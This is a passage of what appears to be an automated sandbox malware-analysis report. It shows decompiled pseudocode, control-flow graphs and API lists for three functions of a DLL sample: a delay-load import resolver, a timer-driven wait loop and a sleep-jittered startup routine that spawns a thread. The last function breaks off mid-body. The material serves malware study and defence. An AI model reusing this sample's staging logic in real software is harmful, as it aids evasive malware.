                                                                                                                                                                                                                                    control_flow_graph 97 2f9ade5-2f9ae4a 98 2f9ae6b-2f9ae95 97->98 99 2f9ae4c-2f9ae66 RaiseException 97->99 101 2f9ae9a-2f9aea6 98->101 102 2f9ae97 98->102 100 2f9b01b-2f9b01f 99->100 103 2f9aeb9-2f9aebb 101->103 104 2f9aea8-2f9aeb3 101->104 102->101 105 2f9aec1-2f9aec8 103->105 106 2f9af63-2f9af6d 103->106 104->103 116 2f9affe-2f9b005 104->116 110 2f9aed8-2f9aee5 LoadLibraryA 105->110 111 2f9aeca-2f9aed6 105->111 108 2f9af79-2f9af7b 106->108 109 2f9af6f-2f9af77 106->109 112 2f9aff9-2f9affc 108->112 113 2f9af7d-2f9af80 108->113 109->108 114 2f9af28-2f9af34 InterlockedExchange 110->114 115 2f9aee7-2f9aef7 GetLastError 110->115 111->110 111->114 112->116 121 2f9afae-2f9afbc GetProcAddress 113->121 122 2f9af82-2f9af85 113->122 125 2f9af5c-2f9af5d FreeLibrary 114->125 126 2f9af36-2f9af3a 114->126 123 2f9aef9-2f9af05 115->123 124 2f9af07-2f9af23 RaiseException 115->124 119 2f9b019 116->119 120 2f9b007-2f9b014 116->120 119->100 120->119 121->112 128 2f9afbe-2f9afce GetLastError 121->128 122->121 127 2f9af87-2f9af92 122->127 123->114 123->124 124->100 125->106 126->106 129 2f9af3c-2f9af48 LocalAlloc 126->129 127->121 130 2f9af94-2f9af9a 127->130 132 2f9afda-2f9afdc 128->132 133 2f9afd0-2f9afd8 128->133 129->106 134 2f9af4a-2f9af5a 129->134 130->121 135 2f9af9c-2f9af9f 130->135 132->112 136 2f9afde-2f9aff6 RaiseException 132->136 133->132 134->106 135->121 137 2f9afa1-2f9afac 135->137 136->112 137->112 137->121
                                                                                                                                                                                                                                    C-Code - Quality: 51%
                                                                                                                                                                                                                                    			E02F9ADE5(long _a4, long _a8) {
				signed int _v8;
				intOrPtr _v16;
				LONG* _v28;
				long _v40;
				long _v44;
				long _v48;
				CHAR* _v52;
				long _v56;
				CHAR* _v60;
				long _v64;
				signed int* _v68;
				char _v72;
				signed int _t76;
				signed int _t80;
				signed int _t81;
				intOrPtr* _t82;
				intOrPtr* _t83;
				intOrPtr* _t85;
				intOrPtr* _t90;
				intOrPtr* _t95;
				intOrPtr* _t98;
				struct HINSTANCE__* _t99;
				void* _t102;
				intOrPtr* _t104;
				void* _t115;
				long _t116;
				void _t125;
				void* _t131;
				signed short _t133;
				struct HINSTANCE__* _t138;
				signed int* _t139;

				_t139 = _a4;
				_v28 = _t139[2] + 0x2f90000;
				_t115 = _t139[3] + 0x2f90000;
				_t131 = _t139[4] + 0x2f90000;
				_v8 = _t139[7];
				_v60 = _t139[1] + 0x2f90000;
				_v16 = _t139[5] + 0x2f90000;
				_v64 = _a8;
				_v72 = 0x24;
				_v68 = _t139;
				_v56 = 0;
				asm("stosd");
				_v48 = 0;
				_v44 = 0;
				_v40 = 0;
				if(( *_t139 & 0x00000001) == 0) {
					_a8 =  &_v72;
					RaiseException(0xc06d0057, 0, 1,  &_a8);
					return 0;
				}
				_t138 =  *_v28;
				_t76 = _a8 - _t115 >> 2 << 2;
				_t133 =  *(_t131 + _t76);
				_a4 = _t76;
				_t80 =  !(_t133 >> 0x1f) & 0x00000001;
				_v56 = _t80;
				_t81 = _t133 + 0x2f90002;
				if(_t80 == 0) {
					_t81 = _t133 & 0x0000ffff;
				}
				_v52 = _t81;
				_t82 =  *0x2f9d1a0; // 0x0
				_t116 = 0;
				if(_t82 == 0) {
					L6:
					if(_t138 != 0) {
						L18:
						_t83 =  *0x2f9d1a0; // 0x0
						_v48 = _t138;
						if(_t83 != 0) {
							_t116 =  *_t83(2,  &_v72);
						}
						if(_t116 != 0) {
							L32:
							 *_a8 = _t116;
							L33:
							_t85 =  *0x2f9d1a0; // 0x0
							if(_t85 != 0) {
								_v40 = _v40 & 0x00000000;
								_v48 = _t138;
								_v44 = _t116;
								 *_t85(5,  &_v72);
							}
							return _t116;
						} else {
							if(_t139[5] == _t116 || _t139[7] == _t116) {
								L27:
								_t116 = GetProcAddress(_t138, _v52);
								if(_t116 == 0) {
									_v40 = GetLastError();
									_t90 =  *0x2f9d19c; // 0x0
									if(_t90 != 0) {
										_t116 =  *_t90(4,  &_v72);
									}
									if(_t116 == 0) {
										_a4 =  &_v72;
										RaiseException(0xc06d007f, _t116, 1,  &_a4);
										_t116 = _v44;
									}
								}
								goto L32;
							} else {
								_t95 =  *((intOrPtr*)(_t138 + 0x3c)) + _t138;
								if( *_t95 == 0x4550 &&  *((intOrPtr*)(_t95 + 8)) == _v8 && _t138 ==  *((intOrPtr*)(_t95 + 0x34))) {
									_t116 =  *(_a4 + _v16);
									if(_t116 != 0) {
										goto L32;
									}
								}
								goto L27;
							}
						}
					}
					_t98 =  *0x2f9d1a0; // 0x0
					if(_t98 == 0) {
						L9:
						_t99 = LoadLibraryA(_v60); // executed
						_t138 = _t99;
						if(_t138 != 0) {
							L13:
							if(InterlockedExchange(_v28, _t138) == _t138) {
								FreeLibrary(_t138);
							} else {
								if(_t139[6] != 0) {
									_t102 = LocalAlloc(0x40, 8);
									if(_t102 != 0) {
										 *(_t102 + 4) = _t139;
										_t125 =  *0x2f9d198; // 0x0
										 *_t102 = _t125;
										 *0x2f9d198 = _t102;
									}
								}
							}
							goto L18;
						}
						_v40 = GetLastError();
						_t104 =  *0x2f9d19c; // 0x0
						if(_t104 == 0) {
							L12:
							_a8 =  &_v72;
							RaiseException(0xc06d007e, 0, 1,  &_a8);
							return _v44;
						}
						_t138 =  *_t104(3,  &_v72);
						if(_t138 != 0) {
							goto L13;
						}
						goto L12;
					}
					_t138 =  *_t98(1,  &_v72);
					if(_t138 != 0) {
						goto L13;
					}
					goto L9;
				}
				_t116 =  *_t82(0,  &_v72);
				if(_t116 != 0) {
					goto L33;
				}
				goto L6;
			}


































                                                                                                                                                                                                                                    0x02f9adf4
                                                                                                                                                                                                                                    0x02f9ae0a
                                                                                                                                                                                                                                    0x02f9ae10
                                                                                                                                                                                                                                    0x02f9ae12
                                                                                                                                                                                                                                    0x02f9ae17
                                                                                                                                                                                                                                    0x02f9ae1d
                                                                                                                                                                                                                                    0x02f9ae22
                                                                                                                                                                                                                                    0x02f9ae25
                                                                                                                                                                                                                                    0x02f9ae33
                                                                                                                                                                                                                                    0x02f9ae3a
                                                                                                                                                                                                                                    0x02f9ae3d
                                                                                                                                                                                                                                    0x02f9ae40
                                                                                                                                                                                                                                    0x02f9ae41
                                                                                                                                                                                                                                    0x02f9ae44
                                                                                                                                                                                                                                    0x02f9ae47
                                                                                                                                                                                                                                    0x02f9ae4a
                                                                                                                                                                                                                                    0x02f9ae4f
                                                                                                                                                                                                                                    0x02f9ae5e
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x02f9ae64
                                                                                                                                                                                                                                    0x02f9ae6e
                                                                                                                                                                                                                                    0x02f9ae78
                                                                                                                                                                                                                                    0x02f9ae7d
                                                                                                                                                                                                                                    0x02f9ae7f
                                                                                                                                                                                                                                    0x02f9ae89
                                                                                                                                                                                                                                    0x02f9ae8c
                                                                                                                                                                                                                                    0x02f9ae8f
                                                                                                                                                                                                                                    0x02f9ae95
                                                                                                                                                                                                                                    0x02f9ae97
                                                                                                                                                                                                                                    0x02f9ae97
                                                                                                                                                                                                                                    0x02f9ae9a
                                                                                                                                                                                                                                    0x02f9ae9d
                                                                                                                                                                                                                                    0x02f9aea2
                                                                                                                                                                                                                                    0x02f9aea6
                                                                                                                                                                                                                                    0x02f9aeb9
                                                                                                                                                                                                                                    0x02f9aebb
                                                                                                                                                                                                                                    0x02f9af63
                                                                                                                                                                                                                                    0x02f9af63
                                                                                                                                                                                                                                    0x02f9af6a
                                                                                                                                                                                                                                    0x02f9af6d
                                                                                                                                                                                                                                    0x02f9af77
                                                                                                                                                                                                                                    0x02f9af77
                                                                                                                                                                                                                                    0x02f9af7b
                                                                                                                                                                                                                                    0x02f9aff9
                                                                                                                                                                                                                                    0x02f9affc
                                                                                                                                                                                                                                    0x02f9affe
                                                                                                                                                                                                                                    0x02f9affe
                                                                                                                                                                                                                                    0x02f9b005
                                                                                                                                                                                                                                    0x02f9b007
                                                                                                                                                                                                                                    0x02f9b011
                                                                                                                                                                                                                                    0x02f9b014
                                                                                                                                                                                                                                    0x02f9b017
                                                                                                                                                                                                                                    0x02f9b017
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x02f9af7d
                                                                                                                                                                                                                                    0x02f9af80
                                                                                                                                                                                                                                    0x02f9afae
                                                                                                                                                                                                                                    0x02f9afb8
                                                                                                                                                                                                                                    0x02f9afbc
                                                                                                                                                                                                                                    0x02f9afc4
                                                                                                                                                                                                                                    0x02f9afc7
                                                                                                                                                                                                                                    0x02f9afce
                                                                                                                                                                                                                                    0x02f9afd8
                                                                                                                                                                                                                                    0x02f9afd8
                                                                                                                                                                                                                                    0x02f9afdc
                                                                                                                                                                                                                                    0x02f9afe1
                                                                                                                                                                                                                                    0x02f9aff0
                                                                                                                                                                                                                                    0x02f9aff6
                                                                                                                                                                                                                                    0x02f9aff6
                                                                                                                                                                                                                                    0x02f9afdc
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x02f9af87
                                                                                                                                                                                                                                    0x02f9af8a
                                                                                                                                                                                                                                    0x02f9af92
                                                                                                                                                                                                                                    0x02f9afa7
                                                                                                                                                                                                                                    0x02f9afac
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x02f9afac
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x02f9af92
                                                                                                                                                                                                                                    0x02f9af80
                                                                                                                                                                                                                                    0x02f9af7b
                                                                                                                                                                                                                                    0x02f9aec1
                                                                                                                                                                                                                                    0x02f9aec8
                                                                                                                                                                                                                                    0x02f9aed8
                                                                                                                                                                                                                                    0x02f9aedb
                                                                                                                                                                                                                                    0x02f9aee1
                                                                                                                                                                                                                                    0x02f9aee5
                                                                                                                                                                                                                                    0x02f9af28
                                                                                                                                                                                                                                    0x02f9af34
                                                                                                                                                                                                                                    0x02f9af5d
                                                                                                                                                                                                                                    0x02f9af36
                                                                                                                                                                                                                                    0x02f9af3a
                                                                                                                                                                                                                                    0x02f9af40
                                                                                                                                                                                                                                    0x02f9af48
                                                                                                                                                                                                                                    0x02f9af4a
                                                                                                                                                                                                                                    0x02f9af4d
                                                                                                                                                                                                                                    0x02f9af53
                                                                                                                                                                                                                                    0x02f9af55
                                                                                                                                                                                                                                    0x02f9af55
                                                                                                                                                                                                                                    0x02f9af48
                                                                                                                                                                                                                                    0x02f9af3a
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x02f9af34
                                                                                                                                                                                                                                    0x02f9aeed
                                                                                                                                                                                                                                    0x02f9aef0
                                                                                                                                                                                                                                    0x02f9aef7
                                                                                                                                                                                                                                    0x02f9af07
                                                                                                                                                                                                                                    0x02f9af0a
                                                                                                                                                                                                                                    0x02f9af1a
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x02f9af20
                                                                                                                                                                                                                                    0x02f9af01
                                                                                                                                                                                                                                    0x02f9af05
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x02f9af05
                                                                                                                                                                                                                                    0x02f9aed2
                                                                                                                                                                                                                                    0x02f9aed6
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x02f9aed6
                                                                                                                                                                                                                                    0x02f9aeaf
                                                                                                                                                                                                                                    0x02f9aeb3
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 02F9AE5E
                                                                                                                                                                                                                                    • LoadLibraryA.KERNELBASE(?), ref: 02F9AEDB
                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 02F9AEE7
                                                                                                                                                                                                                                    • RaiseException.KERNEL32(C06D007E,00000000,00000001,?), ref: 02F9AF1A
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.523875245.0000000002F91000.00000020.00020000.sdmp, Offset: 02F90000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.523858661.0000000002F90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524004271.0000000002F9C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524048885.0000000002F9D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524106649.0000000002F9F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_2f90000_loaddll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ExceptionRaise$ErrorLastLibraryLoad
                                                                                                                                                                                                                                    • String ID: $
                                                                                                                                                                                                                                    • API String ID: 948315288-3993045852
                                                                                                                                                                                                                                    • Opcode ID: f6ffc47bd3245c688a502c99ffd70b86f2a1832bd82585d3bca23ee3767d86bc
                                                                                                                                                                                                                                    • Instruction ID: fb7e467614a17484d173725253bbf894063cc581fe16e0c805143e9c3132fa64
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f6ffc47bd3245c688a502c99ffd70b86f2a1832bd82585d3bca23ee3767d86bc
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6D813CB2E402099FEF14DFA9D884BADB7F5EB48788F10842AEA15D7250E770E945CF50
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 02F96786, Relevance: 16.6, APIs: 11, Instructions: 150timememoryCOMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 139 2f96786-2f967b2 memset CreateWaitableTimerA 140 2f967b8-2f96808 _allmul SetWaitableTimer WaitForMultipleObjects 139->140 141 2f96913-2f96919 GetLastError 139->141 142 2f9680a-2f9680d 140->142 143 2f96883-2f96888 140->143 144 2f9691c-2f96923 141->144 145 2f96818 142->145 146 2f9680f call 2f973fd 142->146 147 2f96889-2f9688d 143->147 151 2f96822 145->151 152 2f96814-2f96816 146->152 149 2f9689d-2f968a1 147->149 150 2f9688f-2f96897 HeapFree 147->150 149->147 153 2f968a3-2f968ac CloseHandle 149->153 150->149 154 2f96825-2f96829 151->154 152->145 152->151 153->144 155 2f9683b-2f96864 call 2f98504 154->155 156 2f9682b-2f96832 154->156 160 2f968ae-2f968b3 155->160 161 2f96866-2f9686f 155->161 156->155 157 2f96834 156->157 157->155 162 2f968d2-2f968da 160->162 163 2f968b5-2f968bb 160->163 161->154 164 2f96871-2f96880 call 2f93bf1 161->164 166 2f968e0-2f96908 _allmul SetWaitableTimer WaitForMultipleObjects 162->166 163->143 165 2f968bd-2f968d0 call 2f9a1b0 163->165 164->143 165->166 166->154 169 2f9690e 166->169 169->143
                                                                                                                                                                                                                                    C-Code - Quality: 83%
                                                                                                                                                                                                                                    			E02F96786(intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				struct %anon52 _v8;
				long _v12;
				char _v16;
				char _v20;
				signed int _v24;
				intOrPtr _v32;
				union _LARGE_INTEGER _v36;
				intOrPtr _v40;
				void* _v44;
				void _v88;
				char _v92;
				struct %anon52 _t46;
				intOrPtr _t51;
				long _t53;
				void* _t54;
				struct %anon52 _t60;
				long _t64;
				signed int _t65;
				void* _t68;
				void* _t70;
				signed int _t71;
				intOrPtr _t73;
				intOrPtr _t76;
				void** _t78;
				void* _t80;

				_t73 = __edx;
				_v92 = 0;
				memset( &_v88, 0, 0x2c);
				_t46 = CreateWaitableTimerA(0, 1, 0);
				_v44 = _t46;
				if(_t46 == 0) {
					_v8.LowPart = GetLastError();
				} else {
					_push(0xffffffff);
					_push(0xff676980);
					_push(0);
					_push( *0x2f9d240);
					_v20 = 0;
					_v16 = 0;
					L02F9B0C8();
					_v36.LowPart = _t46;
					_v32 = _t73;
					SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0);
					_t51 =  *0x2f9d26c; // 0x344
					_v40 = _t51;
					_t53 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
					_v8.LowPart = _t53;
					if(_t53 == 0) {
						if(_a8 != 0) {
							L4:
							 *0x2f9d24c = 5;
						} else {
							_t68 = E02F973FD(_t73); // executed
							if(_t68 != 0) {
								goto L4;
							}
						}
						_v12 = 0;
						L6:
						L6:
						if(_v12 == 1 && ( *0x2f9d260 & 0x00000001) == 0) {
							_v12 = 2;
						}
						_t71 = _v12;
						_t58 = _t71 << 4;
						_t76 = _t80 + (_t71 << 4) - 0x54;
						_t72 = _t71 + 1;
						_v24 = _t71 + 1;
						_t60 = E02F98504(_t72, _t72, _t80 + _t58 - 0x58, _t76,  &_v20,  &_v16); // executed
						_v8.LowPart = _t60;
						if(_t60 != 0) {
							goto L17;
						}
						_t65 = _v24;
						_t90 = _t65 - 3;
						_v12 = _t65;
						if(_t65 != 3) {
							goto L6;
						} else {
							_v8.LowPart = E02F93BF1(_t72, _t90,  &_v92, _a4, _a8);
						}
						goto L12;
						L17:
						__eflags = _t60 - 0x10d2;
						if(_t60 != 0x10d2) {
							_push(0xffffffff);
							_push(0xff676980);
							_push(0);
							_push( *0x2f9d244);
							goto L21;
						} else {
							__eflags =  *0x2f9d248; // 0x0
							if(__eflags == 0) {
								goto L12;
							} else {
								_t60 = E02F9A1B0();
								_push(0xffffffff);
								_push(0xdc3cba00);
								_push(0);
								_push( *0x2f9d248);
								L21:
								L02F9B0C8();
								_v36.LowPart = _t60;
								_v32 = _t76;
								SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0); // executed
								_t64 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
								__eflags = _t64;
								_v8.LowPart = _t64;
								if(_t64 == 0) {
									goto L6;
								} else {
									goto L12;
								}
							}
						}
						L25:
					}
					L12:
					_t78 =  &_v92;
					_t70 = 3;
					do {
						_t54 =  *_t78;
						if(_t54 != 0) {
							HeapFree( *0x2f9d238, 0, _t54);
						}
						_t78 =  &(_t78[4]);
						_t70 = _t70 - 1;
					} while (_t70 != 0);
					CloseHandle(_v44);
				}
				return _v8;
				goto L25;
			}




























                                                                                                                                                                                                                                    0x02f96786
                                                                                                                                                                                                                                    0x02f96798
                                                                                                                                                                                                                                    0x02f9679b
                                                                                                                                                                                                                                    0x02f967a7
                                                                                                                                                                                                                                    0x02f967af
                                                                                                                                                                                                                                    0x02f967b2
                                                                                                                                                                                                                                    0x02f96919
                                                                                                                                                                                                                                    0x02f967b8
                                                                                                                                                                                                                                    0x02f967b8
                                                                                                                                                                                                                                    0x02f967ba
                                                                                                                                                                                                                                    0x02f967bf
                                                                                                                                                                                                                                    0x02f967c0
                                                                                                                                                                                                                                    0x02f967c6
                                                                                                                                                                                                                                    0x02f967c9
                                                                                                                                                                                                                                    0x02f967cc
                                                                                                                                                                                                                                    0x02f967da
                                                                                                                                                                                                                                    0x02f967e5
                                                                                                                                                                                                                                    0x02f967e8
                                                                                                                                                                                                                                    0x02f967ea
                                                                                                                                                                                                                                    0x02f967f7
                                                                                                                                                                                                                                    0x02f96801
                                                                                                                                                                                                                                    0x02f96805
                                                                                                                                                                                                                                    0x02f96808
                                                                                                                                                                                                                                    0x02f9680d
                                                                                                                                                                                                                                    0x02f96818
                                                                                                                                                                                                                                    0x02f96818
                                                                                                                                                                                                                                    0x02f9680f
                                                                                                                                                                                                                                    0x02f9680f
                                                                                                                                                                                                                                    0x02f96816
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x02f96816
                                                                                                                                                                                                                                    0x02f96822
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x02f96825
                                                                                                                                                                                                                                    0x02f96829
                                                                                                                                                                                                                                    0x02f96834
                                                                                                                                                                                                                                    0x02f96834
                                                                                                                                                                                                                                    0x02f9683b
                                                                                                                                                                                                                                    0x02f96844
                                                                                                                                                                                                                                    0x02f9684b
                                                                                                                                                                                                                                    0x02f96854
                                                                                                                                                                                                                                    0x02f96857
                                                                                                                                                                                                                                    0x02f9685a
                                                                                                                                                                                                                                    0x02f96861
                                                                                                                                                                                                                                    0x02f96864
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x02f96866
                                                                                                                                                                                                                                    0x02f96869
                                                                                                                                                                                                                                    0x02f9686c
                                                                                                                                                                                                                                    0x02f9686f
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x02f96871
                                                                                                                                                                                                                                    0x02f96880
                                                                                                                                                                                                                                    0x02f96880
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x02f968ae
                                                                                                                                                                                                                                    0x02f968ae
                                                                                                                                                                                                                                    0x02f968b3
                                                                                                                                                                                                                                    0x02f968d2
                                                                                                                                                                                                                                    0x02f968d4
                                                                                                                                                                                                                                    0x02f968d9
                                                                                                                                                                                                                                    0x02f968da
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x02f968b5
                                                                                                                                                                                                                                    0x02f968b5
                                                                                                                                                                                                                                    0x02f968bb
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x02f968bd
                                                                                                                                                                                                                                    0x02f968bd
                                                                                                                                                                                                                                    0x02f968c2
                                                                                                                                                                                                                                    0x02f968c4
                                                                                                                                                                                                                                    0x02f968c9
                                                                                                                                                                                                                                    0x02f968ca
                                                                                                                                                                                                                                    0x02f968e0
                                                                                                                                                                                                                                    0x02f968e0
                                                                                                                                                                                                                                    0x02f968e8
                                                                                                                                                                                                                                    0x02f968f3
                                                                                                                                                                                                                                    0x02f968f6
                                                                                                                                                                                                                                    0x02f96901
                                                                                                                                                                                                                                    0x02f96903
                                                                                                                                                                                                                                    0x02f96905
                                                                                                                                                                                                                                    0x02f96908
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x02f9690e
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x02f9690e
                                                                                                                                                                                                                                    0x02f96908
                                                                                                                                                                                                                                    0x02f968bb
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x02f968b3
                                                                                                                                                                                                                                    0x02f96883
                                                                                                                                                                                                                                    0x02f96885
                                                                                                                                                                                                                                    0x02f96888
                                                                                                                                                                                                                                    0x02f96889
                                                                                                                                                                                                                                    0x02f96889
                                                                                                                                                                                                                                    0x02f9688d
                                                                                                                                                                                                                                    0x02f96897
                                                                                                                                                                                                                                    0x02f96897
                                                                                                                                                                                                                                    0x02f9689d
                                                                                                                                                                                                                                    0x02f968a0
                                                                                                                                                                                                                                    0x02f968a0
                                                                                                                                                                                                                                    0x02f968a6
                                                                                                                                                                                                                                    0x02f968a6
                                                                                                                                                                                                                                    0x02f96923
                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • memset.NTDLL ref: 02F9679B
                                                                                                                                                                                                                                    • CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 02F967A7
                                                                                                                                                                                                                                    • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 02F967CC
                                                                                                                                                                                                                                    • SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000), ref: 02F967E8
                                                                                                                                                                                                                                    • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 02F96801
                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,00000000), ref: 02F96897
                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 02F968A6
                                                                                                                                                                                                                                    • _allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 02F968E0
                                                                                                                                                                                                                                    • SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,02F92417,?), ref: 02F968F6
                                                                                                                                                                                                                                    • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 02F96901
                                                                                                                                                                                                                                      • Part of subcall function 02F973FD: StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,033E9388,00000000,?,76D7F710,00000000,76D7F730), ref: 02F9744C
                                                                                                                                                                                                                                      • Part of subcall function 02F973FD: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,033E93C0,?,00000000,30314549,00000014,004F0053,033E937C), ref: 02F974E9
                                                                                                                                                                                                                                      • Part of subcall function 02F973FD: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,02F96814), ref: 02F974FB
                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 02F96913
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.523875245.0000000002F91000.00000020.00020000.sdmp, Offset: 02F90000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.523858661.0000000002F90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524004271.0000000002F9C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524048885.0000000002F9D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524106649.0000000002F9F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_2f90000_loaddll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3521023985-0
                                                                                                                                                                                                                                    • Opcode ID: f51221c3d190e23e875480da0d3f8fb19d806e74cd56229e3258cc621c2112eb
                                                                                                                                                                                                                                    • Instruction ID: 30e07894d73da4640c8e200dbbfeeed1e4a1364e485e2c03cead120919b0f4f5
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f51221c3d190e23e875480da0d3f8fb19d806e74cd56229e3258cc621c2112eb
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C5512971C01229AAEF10AF95DC44EEEBFBDEF497A4F204616EA10E2190D7709654CFA0
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 0040163F, Relevance: 15.1, APIs: 10, Instructions: 98threadsleepsynchronizationCOMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 172 40163f-401652 call 401850 175 401740-401742 172->175 176 401658 172->176 177 401659-401690 GetSystemTime SwitchToThread call 4018f4 Sleep 176->177 180 401692-401694 177->180 181 40169a-40169e 180->181 182 40173f 180->182 183 4016a0-4016ab call 401538 181->183 184 4016ef-40170a call 4012dc 181->184 182->175 189 4016e9 183->189 190 4016ad-4016bf GetLongPathNameW 183->190 191 401730-401732 GetLastError 184->191 192 40170c-40171a WaitForSingleObject 184->192 189->184 194 4016e1-4016e7 190->194 195 4016c1-4016d2 call 401de1 190->195 193 401735-40173b 191->193 196 401727-40172e CloseHandle 192->196 197 40171c-401721 GetExitCodeThread 192->197 193->182 198 40173d GetLastError 193->198 194->184 195->194 201 4016d4-4016da GetLongPathNameW call 401dfc 195->201 196->193 197->196 198->182 203 4016df 201->203 203->184
                                                                                                                                                                                                                                    C-Code - Quality: 79%
                                                                                                                                                                                                                                    			E0040163F(char _a4) {
				long _v8;
				struct _SYSTEMTIME _v24;
				char _v48;
				void* __edi;
				long _t20;
				int _t22;
				long _t25;
				long _t26;
				long _t30;
				void* _t36;
				intOrPtr _t38;
				intOrPtr _t43;
				signed int _t44;
				void* _t48;
				signed int _t51;
				void* _t54;
				intOrPtr* _t55;

				_t20 = E00401850();
				_v8 = _t20;
				if(_t20 != 0) {
					return _t20;
				}
				do {
					GetSystemTime( &_v24);
					_t22 = SwitchToThread();
					asm("cdq");
					_t44 = 9;
					_t51 = _t22 + (_v24.wMilliseconds & 0x0000ffff) % _t44;
					_t25 = E004018F4(0, _t51); // executed
					_v8 = _t25;
					Sleep(_t51 << 5); // executed
					_t26 = _v8;
				} while (_t26 == 0xc);
				if(_t26 != 0) {
					L18:
					return _t26;
				}
				if(_a4 != 0) {
					L11:
					_push(0);
					_t54 = E004012DC(E0040135A,  &_v48);
					if(_t54 == 0) {
						_v8 = GetLastError();
					} else {
						_t30 = WaitForSingleObject(_t54, 0xffffffff);
						_v8 = _t30;
						if(_t30 == 0) {
							GetExitCodeThread(_t54,  &_v8);
						}
						CloseHandle(_t54);
					}
					_t26 = _v8;
					if(_t26 == 0xffffffff) {
						_t26 = GetLastError();
					}
					goto L18;
				}
